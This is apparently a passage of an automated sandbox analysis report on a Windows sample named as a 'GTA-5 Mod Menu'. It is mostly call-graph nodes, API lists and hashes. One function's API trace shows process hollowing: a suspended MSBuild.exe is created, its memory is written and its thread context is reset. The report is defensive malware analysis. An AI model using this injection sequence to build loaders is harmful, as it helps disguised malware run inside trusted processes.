19991 f970b9 19990->19991 19992 f9703c 19990->19992 19991->19992 19993 f9cf3a 30 API calls 19991->19993 19992->19975 19995 f970e1 19993->19995 19994 f97111 GetFileType 19994->19995 19995->19992 19995->19994 20011 f91ce8 LeaveCriticalSection 19996->20011 19998 f97052 19999->19987 20001 f969b4 __strnicoll 14 API calls 20000->20001 20002 f9ce9c 20001->20002 20004 f96430 6 API calls 20002->20004 20006 f9cea9 20002->20006 20003 f95677 ___free_lconv_mon 14 API calls 20005 f9cefe 20003->20005 20004->20002 20005->19987 20006->20003 20010 f91ce8 LeaveCriticalSection 20007->20010 20009 f9cfd6 20009->19986 20010->20009 20011->19998 20012 f8d200 20013 f9213a ___scrt_uninitialize_crt 68 API calls 20012->20013 20014 f8d208 20013->20014 20022 f97eb2 20014->20022 20016 f8d20d 20017 f97f5d 14 API calls 20016->20017 20018 f8d21c DeleteCriticalSection 20017->20018 20018->20016 20019 f8d237 20018->20019 20020 f95677 ___free_lconv_mon 14 API calls 20019->20020 20021 f8d242 20020->20021 20023 f97ebe ___scrt_is_nonwritable_in_current_image 20022->20023 20032 f91cd1 EnterCriticalSection 20023->20032 20025 f97f35 20037 f97f54 20025->20037 20027 f97ec9 20027->20025 20029 f97f09 DeleteCriticalSection 20027->20029 20033 f91f92 20027->20033 20030 f95677 ___free_lconv_mon 14 API calls 20029->20030 20030->20027 20032->20027 20034 f91fa5 _Fputc 20033->20034 20040 f92050 20034->20040 20036 f91fb1 _Fputc 20036->20027 20112 f91ce8 LeaveCriticalSection 20037->20112 20039 f97f41 20039->20016 20041 f9205c ___scrt_is_nonwritable_in_current_image 20040->20041 20042 f92089 20041->20042 20043 f92066 20041->20043 20050 f92081 20042->20050 20051 f8d0ff EnterCriticalSection 20042->20051 20044 f91b68 __strnicoll 29 API calls 20043->20044 20044->20050 20046 f920a7 20052 f91fc2 20046->20052 20048 f920b4 20066 f920df 20048->20066 20050->20036 20051->20046 20053 f91fcf 20052->20053 20054 f91ff2 20052->20054 20055 f91b68 __strnicoll 29 API calls 20053->20055 20056 f921a8 ___scrt_uninitialize_crt 64 API calls 20054->20056 20064 f91fea 20054->20064 20055->20064 20057 f9200a 20056->20057 20058 f97f5d 14 API calls 20057->20058 20059 f92012 20058->20059 20060 f98e04 _Ungetc 29 API calls 20059->20060 20061 f9201e 20060->20061 20069 f9d0d6 20061->20069 20064->20048 20065 f95677 ___free_lconv_mon 14 API calls 20065->20064 20111 f8d113 LeaveCriticalSection 20066->20111 20068 f920e5 20068->20050 20070 f9d0ff 20069->20070 20075 f92025 20069->20075 20071 f9d14e 20070->20071 20073 f9d126 20070->20073 20072 f91b68 __strnicoll 29 API calls 20071->20072 20072->20075 20076 f9d179 20073->20076 20075->20064 20075->20065 20077 f9d185 ___scrt_is_nonwritable_in_current_image 20076->20077 20084 f9cfd8 EnterCriticalSection 20077->20084 20079 f9d193 20081 f9d1c4 20079->20081 20085 f9d036 20079->20085 20098 f9d1fe 20081->20098 20084->20079 20086 f9cd8f _Fputc 29 API calls 20085->20086 20089 f9d046 20086->20089 20087 f9d04c 20101 f9cdf9 20087->20101 20089->20087 20091 f9cd8f _Fputc 29 API calls 20089->20091 20097 f9d07e 20089->20097 20090 f9d0a4 _Fputc 20090->20081 20094 f9d075 20091->20094 20092 f9cd8f _Fputc 29 API calls 20093 f9d08a CloseHandle 20092->20093 20093->20087 20095 f9d096 GetLastError 20093->20095 20096 f9cd8f _Fputc 29 API calls 20094->20096 20095->20087 20096->20097 20097->20087 20097->20092 20110 f9cffb LeaveCriticalSection 20098->20110 20100 f9d1e7 20100->20075 20102 f9ce08 20101->20102 20103 f9ce6f 20101->20103 20102->20103 20106 f9ce32 20102->20106 20104 f912d4 __strnicoll 14 API calls 20103->20104 20105 f9ce74 20104->20105 20107 f912e7 __dosmaperr 14 API calls 20105->20107 20108 f9ce5f 20106->20108 20109 f9ce59 SetStdHandle 20106->20109 20107->20108 20108->20090 20109->20108 20110->20100 20111->20068 20112->20039

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00FB0110,00FB0100), ref: 00FB0334
                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00FB0347
                                                                    • Wow64GetThreadContext.KERNEL32(00000094,00000000), ref: 00FB0365
                                                                    • ReadProcessMemory.KERNELBASE(00000090,?,00FB0154,00000004,00000000), ref: 00FB0389
                                                                    • VirtualAllocEx.KERNELBASE(00000090,?,?,00003000,00000040), ref: 00FB03B4
                                                                    • TerminateProcess.KERNELBASE(00000090,00000000), ref: 00FB03D3
                                                                    • WriteProcessMemory.KERNELBASE(00000090,00000000,?,?,00000000,?), ref: 00FB040C
                                                                    • WriteProcessMemory.KERNELBASE(00000090,00400000,?,?,00000000,?,00000028), ref: 00FB0457
                                                                    • WriteProcessMemory.KERNELBASE(00000090,?,?,00000004,00000000), ref: 00FB0495
                                                                    • Wow64SetThreadContext.KERNEL32(00000094,00AB0000), ref: 00FB04D1
                                                                    • ResumeThread.KERNELBASE(00000094), ref: 00FB04E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                    • API String ID: 2440066154-3857624555
                                                                    • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                    • Instruction ID: 08eb09a10c978d7ec9ef17f669047277af9dd48a8b257bc026e6e2c8b1a6b9a2
                                                                    • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                    • Instruction Fuzzy Hash: E5B1077264064AAFDB60CF69CC80BDA73A5FF88724F158124EA0CAB341D774FA51CB94

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: File$AddressCloseCreateHandleProcSize
                                                                    • String ID: CreateFileA
                                                                    • API String ID: 2547132502-1429953656
                                                                    • Opcode ID: 8b8a758aaafe803d3057e0e932a3bed6317a12aee16b5af2f69458797472e9b0
                                                                    • Instruction ID: 852fbb8ee6ba40f2327faa3b6b20eeeb886fb59715bb8ffa4edb3fe3267f904e
                                                                    • Opcode Fuzzy Hash: 8b8a758aaafe803d3057e0e932a3bed6317a12aee16b5af2f69458797472e9b0
                                                                    • Instruction Fuzzy Hash: EF41A5B1D082099FCB00EFA8D49879EBBF0BF49314F008529E899A7350D7789945DF92

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 41 f96602-f9660e 42 f966a0-f966a3 41->42 43 f966a9 42->43 44 f96613-f96624 42->44 47 f966ab-f966af 43->47 45 f96631-f9664a LoadLibraryExW 44->45 46 f96626-f96629 44->46 50 f9664c-f96655 GetLastError 45->50 51 f966b0-f966c0 45->51 48 f966c9-f966cb 46->48 49 f9662f 46->49 48->47 53 f9669d 49->53 54 f9668e-f9669b 50->54 55 f96657-f96669 call f99cc4 50->55 51->48 52 f966c2-f966c3 FreeLibrary 51->52 52->48 53->42 54->53 55->54 58 f9666b-f9667d call f99cc4 55->58 58->54 61 f9667f-f9668c LoadLibraryExW 58->61 61->51 61->54
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,EDB057DF,?,00F96711,00000000,00000000,00000000,00000000), ref: 00F966C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3664257935-537541572
                                                                    • Opcode ID: 0cfbaa8e950179300541a9f106c299b00caf4e615857ee14baab1125214c21e3
                                                                    • Instruction ID: 97e9d84ae089510a5c08ec6ba82b14b9eb0c227958f019faed2653b44d70f808
                                                                    • Opcode Fuzzy Hash: 0cfbaa8e950179300541a9f106c299b00caf4e615857ee14baab1125214c21e3
                                                                    • Instruction Fuzzy Hash: 5521E772E01219ABEF319B659C44A5B3768AB467B0F250214FD05EB290EB74ED00FAD1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 62 f96dea-f96e03 63 f96e19-f96e1e 62->63 64 f96e05-f96e15 call f8f11d 62->64 66 f96e2b-f96e51 call f956ff 63->66 67 f96e20-f96e28 63->67 64->63 70 f96e17 64->70 72 f96fc7-f96fd8 call f87191 66->72 73 f96e57-f96e62 66->73 67->66 70->63 75 f96e68-f96e6d 73->75 76 f96fba 73->76 78 f96e6f-f96e78 call f89f30 75->78 79 f96e86-f96e91 call f956b1 75->79 80 f96fbc 76->80 78->80 89 f96e7e-f96e84 78->89 79->80 88 f96e97 79->88 83 f96fbe-f96fc5 call f89ec7 80->83 83->72 90 f96e9d-f96ea2 88->90 89->90 90->80 91 f96ea8-f96ebd call f956ff 90->91 91->80 94 f96ec3-f96ed5 call f964b3 91->94 96 f96eda-f96ede 94->96 96->80 97 f96ee4-f96eec 96->97 98 f96eee-f96ef3 97->98 99 f96f26-f96f32 97->99 98->83 102 f96ef9-f96efb 98->102 100 f96faf 99->100 101 f96f34-f96f36 99->101 105 f96fb1-f96fb8 call f89ec7 100->105 103 f96f38-f96f41 call f89f30 101->103 104 f96f4b-f96f56 call f956b1 101->104 102->80 106 f96f01-f96f1b call f964b3 102->106 103->105 116 f96f43-f96f49 103->116 104->105 117 f96f58 104->117 105->80 106->83 115 f96f21 106->115 115->80 118 f96f5e-f96f63 116->118 117->118 118->105 119 f96f65-f96f7d call f964b3 118->119 119->105 122 f96f7f-f96f86 119->122 123 f96f88-f96f89 122->123 124 f96fa7-f96fad 122->124 125 f96f8a-f96f9c call f957c1 123->125 124->125 125->105 128 f96f9e-f96fa5 call f89ec7 125->128 128->83
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 00F96E6F
                                                                    • __alloca_probe_16.LIBCMT ref: 00F96F38
                                                                    • __freea.LIBCMT ref: 00F96F9F
                                                                      • Part of subcall function 00F956B1: RtlAllocateHeap.NTDLL(00000000,00F97635,?,?,00F97635,00000220,?,?,?), ref: 00F956E3
                                                                    • __freea.LIBCMT ref: 00F96FB2
                                                                    • __freea.LIBCMT ref: 00F96FBF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1423051803-0
                                                                    • Opcode ID: e265b308054650751f51a9a03056a2bd04dd1231945ff9dfde47b5f4227b5e28
                                                                    • Instruction ID: 4769d611c48bb634048a6d65c61e5afc0289393d879ea464a069f123c62d78a4
                                                                    • Opcode Fuzzy Hash: e265b308054650751f51a9a03056a2bd04dd1231945ff9dfde47b5f4227b5e28
                                                                    • Instruction Fuzzy Hash: 195197729002066FFF219E65EC45EBB76A9DF44728F150129FD08D6241FB75DC10B7A0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 131 f81db0-f81e7e call f81000 * 2 GetProcAddress 136 f81e8f-f81ecb VirtualProtect 131->136 137 f81e84-f81e8c 131->137 139 f81edc-f81ef3 call f87191 136->139 140 f81ed1-f81ed7 call f81bd0 136->140 137->136 140->139
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcProtectVirtual
                                                                    • String ID: @$VirtualProtect
                                                                    • API String ID: 3759838892-29487290
                                                                    • Opcode ID: a5ce620f7789add63d321d081f2fc6aef5f0192c1daf5d7f73e275a691072fa7
                                                                    • Instruction ID: e7c224b8d8855387e409e117010beecc30fb3daa5ce2c357557c1872a0c11d0b
                                                                    • Opcode Fuzzy Hash: a5ce620f7789add63d321d081f2fc6aef5f0192c1daf5d7f73e275a691072fa7
                                                                    • Instruction Fuzzy Hash: CA41D1B0901209DFDB04EFA9D9986DEBBF0FF48354F10851AE848AB350D779A985DF81

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00F8F160,?,00F8F315,00000000,?,?,00F8F160,EDB057DF,?,00F8F160), ref: 00F8F264
                                                                    • TerminateProcess.KERNEL32(00000000,?,00F8F315,00000000,?,?,00F8F160,EDB057DF,?,00F8F160), ref: 00F8F26B
                                                                    • ExitProcess.KERNEL32 ref: 00F8F27D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: ff1cb08daa51a431fed24c31acc80b253f7947f16468b30b9a014448e1c2e6af
                                                                    • Instruction ID: 74e45ec7dde753e0381f10ad2c2ecd8a6d2978964e930b241eb9692c5b59dbea
                                                                    • Opcode Fuzzy Hash: ff1cb08daa51a431fed24c31acc80b253f7947f16468b30b9a014448e1c2e6af
                                                                    • Instruction Fuzzy Hash: B7D092B600060CAFCF013F60DC0D89D3F6AEF4A761B984064B9095A131CB3A995AFB81

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 151 f9d364-f9d386 152 f9d579 151->152 153 f9d38c-f9d38e 151->153 156 f9d57b-f9d57f 152->156 154 f9d3ba-f9d3dd 153->154 155 f9d390-f9d3af call f91b68 153->155 158 f9d3df-f9d3e1 154->158 159 f9d3e3-f9d3e9 154->159 162 f9d3b2-f9d3b5 155->162 158->159 161 f9d3eb-f9d3fc 158->161 159->155 159->161 163 f9d40f-f9d41f call f9d691 161->163 164 f9d3fe-f9d40c call f9c112 161->164 162->156 169 f9d468-f9d47a 163->169 170 f9d421-f9d427 163->170 164->163 173 f9d47c-f9d482 169->173 174 f9d4d1-f9d4f1 WriteFile 169->174 171 f9d429-f9d42c 170->171 172 f9d450-f9d466 call f9d70e 170->172 175 f9d42e-f9d431 171->175 176 f9d437-f9d446 call f9dad5 171->176 192 f9d449-f9d44b 172->192 180 f9d4bd-f9d4ca call f9db3d 173->180 181 f9d484-f9d487 173->181 178 f9d4fc 174->178 179 f9d4f3-f9d4f9 GetLastError 174->179 175->176 182 f9d511-f9d514 175->182 176->192 186 f9d4ff-f9d50a 178->186 179->178 191 f9d4cf 180->191 187 f9d4a9-f9d4bb call f9dd01 181->187 188 f9d489-f9d48c 181->188 195 f9d517-f9d519 182->195 193 f9d50c-f9d50f 186->193 194 f9d574-f9d577 186->194 199 f9d4a4-f9d4a7 187->199 188->195 196 f9d492-f9d49f call f9dc18 188->196 191->199 192->186 193->182 194->156 200 f9d51b-f9d520 195->200 201 f9d547-f9d553 195->201 196->199 199->192 202 f9d539-f9d542 call f91360 200->202 203 f9d522-f9d534 200->203 204 f9d55d-f9d56f 201->204 205 f9d555-f9d55b 201->205 202->162 203->162 204->162 205->152 205->204
                                                                    APIs
                                                                      • Part of subcall function 00F9D70E: GetConsoleOutputCP.KERNEL32(EDB057DF,00000000,00000000,?), ref: 00F9D771
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00F8D7F2,?,00F8DA54), ref: 00F9D4E9
                                                                    • GetLastError.KERNEL32(?,00F8D7F2,?,00F8DA54,?,00F8DA54,?,?,?,?,?,?,?,00000000,?,?), ref: 00F9D4F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                    • String ID:
                                                                    • API String ID: 2915228174-0
                                                                    • Opcode ID: f1ebb849ad4a2a09fd593c3914deb772cf0cd37993b1503cc3620d55dd720f96
                                                                    • Instruction ID: 8a1ce2dc4236d10eeec34c1dd5b6b9d58feced4449ec807d20621b6b6312be8e
                                                                    • Opcode Fuzzy Hash: f1ebb849ad4a2a09fd593c3914deb772cf0cd37993b1503cc3620d55dd720f96
                                                                    • Instruction Fuzzy Hash: 5C61C4B2D00119AFEF11DFA8CC84EFEBBB9AF49318F240145E904A7256D335D941EBA1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 208 f97268-f97290 call f9746d 211 f97455-f97456 call f974de 208->211 212 f97296-f9729c 208->212 215 f9745b-f9745d 211->215 214 f9729f-f972a5 212->214 216 f972ab-f972b7 214->216 217 f973a1-f973c0 call f8c650 214->217 219 f9745e-f9746c call f87191 215->219 216->214 220 f972b9-f972bf 216->220 225 f973c3-f973c8 217->225 223 f97399-f9739c 220->223 224 f972c5-f972d1 IsValidCodePage 220->224 223->219 224->223 227 f972d7-f972de 224->227 228 f973ca-f973cf 225->228 229 f97405-f9740f 225->229 230 f97300-f9730d GetCPInfo 227->230 231 f972e0-f972ec 227->231 234 f973d1-f973d9 228->234 235 f97402 228->235 229->225 236 f97411-f9743b call f977b9 229->236 232 f9738d-f97393 230->232 233 f9730f-f9732e call f8c650 230->233 237 f972f0-f972fb 231->237 232->211 232->223 233->237 249 f97330-f97337 233->249 240 f973db-f973de 234->240 241 f973fa-f97400 234->241 235->229 247 f9743c-f9744b 236->247 238 f9744d-f9744e call f977f7 237->238 248 f97453 238->248 245 f973e0-f973e6 240->245 241->228 241->235 245->241 250 f973e8-f973f8 245->250 247->238 247->247 248->215 251 f97339-f9733e 249->251 252 f97363-f97366 249->252 250->241 250->245 251->252 253 f97340-f97348 251->253 254 f9736b-f97372 252->254 255 f9735b-f97361 253->255 256 f9734a-f97351 253->256 254->254 257 f97374-f97388 call f977b9 254->257 255->251 255->252 258 f97352-f97359 256->258 257->237 258->255 258->258
                                                                    APIs
                                                                      • Part of subcall function 00F9746D: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00F97498
                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00F97678,?,00000000,?,?,?), ref: 00F972C9
                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F97678,?,00000000,?,?,?), ref: 00F97305
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: CodeInfoPageValid
                                                                    • String ID:
                                                                    • API String ID: 546120528-0
                                                                    • Opcode ID: 1aba620ed5f05ff48b0e712f63359af76b9e59ba480cd21aabdbf7ce293d9f11
                                                                    • Instruction ID: e79c42c50b29e98cf08f013696029f0cfd6b05b4d9844d3a5ead68c0271e2815
                                                                    • Opcode Fuzzy Hash: 1aba620ed5f05ff48b0e712f63359af76b9e59ba480cd21aabdbf7ce293d9f11
                                                                    • Instruction Fuzzy Hash: 39513470E183458EEF20EF75C881AAABBF5FF41310F18446ED48687242E6749945FF90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 261 f9db3d-f9db92 call f8a010 264 f9db94 261->264 265 f9dc07-f9dc17 call f87191 261->265 267 f9db9a 264->267 269 f9dba0-f9dba2 267->269 270 f9dbbc-f9dbe1 WriteFile 269->270 271 f9dba4-f9dba9 269->271 274 f9dbff-f9dc05 GetLastError 270->274 275 f9dbe3-f9dbee 270->275 272 f9dbab-f9dbb1 271->272 273 f9dbb2-f9dbba 271->273 272->273 273->269 273->270 274->265 275->265 276 f9dbf0-f9dbfb 275->276 276->267 277 f9dbfd 276->277 277->265
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00F9D4CF,?,00F8DA54,?,?,?,00000000), ref: 00F9DBD9
                                                                    • GetLastError.KERNEL32(?,00F9D4CF,?,00F8DA54,?,?,?,00000000,?,?,?,?,?,00F8D7F2,?,00F8DA54), ref: 00F9DBFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID:
                                                                    • API String ID: 442123175-0
                                                                    • Opcode ID: 9fa44953b92f0909605fbcc26895cbe2ac5afd7f76e6e56790a521efd64276e6
                                                                    • Instruction ID: 1ada3d8c46acb36e779c2492bf3c8d3ab6082e47c174d541d2443c15648afd88
                                                                    • Opcode Fuzzy Hash: 9fa44953b92f0909605fbcc26895cbe2ac5afd7f76e6e56790a521efd64276e6
                                                                    • Instruction Fuzzy Hash: 65219135A002199BDF19DF29DC80AE9B7B9FB88305F2441A9E946D7251D730ED42DF60

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
